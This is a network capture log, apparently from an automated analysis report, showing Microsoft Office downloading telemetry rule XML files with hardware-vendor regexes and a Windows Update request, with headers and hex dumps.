2024-11-09 01:47:21 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014721Z-16547b76f7frbg6bhC1DFWr5400000000ab000000000gwzv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:21 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.7	49750	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:21 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:21 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014721Z-16547b76f7fsjlq8hC1DFWehq00000000a5000000000p7m4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:21 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.7	49751	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:21 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:21 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: d92822fd-901e-0048-0b55-2eb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014721Z-17df447cdb5fzdpxhC1DFWdd3400000006zg000000007y20 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:22 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.7	49752	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:22 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:22 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 6b3fdf92-c01e-008e-384a-2e7381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014722Z-15869dbbcc6x4rp4hC1DFW3t7w0000000ck000000000hxnr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:22 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.7	49753	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:22 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:22 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 67c77863-101e-0065-4374-304088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014722Z-17df447cdb5zfhrmhC1DFWh33000000006tg000000003cqt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:22 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.7	49755	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:22 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:22 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:22 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 80fffc35-b01e-0002-7355-2e1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014722Z-17df447cdb5km9skhC1DFWy2rc000000071000000000fyuw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:22 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.7	49758	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:22 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:22 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:22 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 65394723-101e-00a2-80f1-2c9f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014722Z-16547b76f7f775p5hC1DFWzdvn0000000ahg000000001c6m x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:22 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.7	49759	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:22 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:22 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:22 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: c6b44c52-001e-0028-1ef0-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014722Z-16547b76f7fmbrhqhC1DFWkds80000000am0000000002ppv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:22 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.7	49760	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:22 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:23 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:22 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014722Z-16547b76f7fcjqqhhC1DFWrrrc0000000af0000000009sea x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:23 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.7	49761	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:22 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:23 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:23 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: e92242f2-701e-005c-7858-2ebb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014723Z-17df447cdb5rnd49hC1DFWgmpw000000014g0000000074bp x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:23 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.7	49762	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:23 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:23 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:23 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 11f32c1c-b01e-003d-4c5c-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014723Z-15869dbbcc6x4rp4hC1DFW3t7w0000000cng00000000bwwz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:23 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49754	4.245.163.56	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:23 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=zwDyvpazmB6cKF9&MD=Lc9CB+c+ HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-09 01:47:23 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 643a2889-4ed6-4663-bdaf-fd24a0b6ea82 MS-RequestId: 6d65310c-0468-4cba-ae66-7b394491d2de MS-CV: XkfTQ/I320+c5iQm.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 09 Nov 2024 01:47:22 GMT Connection: close Content-Length: 24490
2024-11-09 01:47:23 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 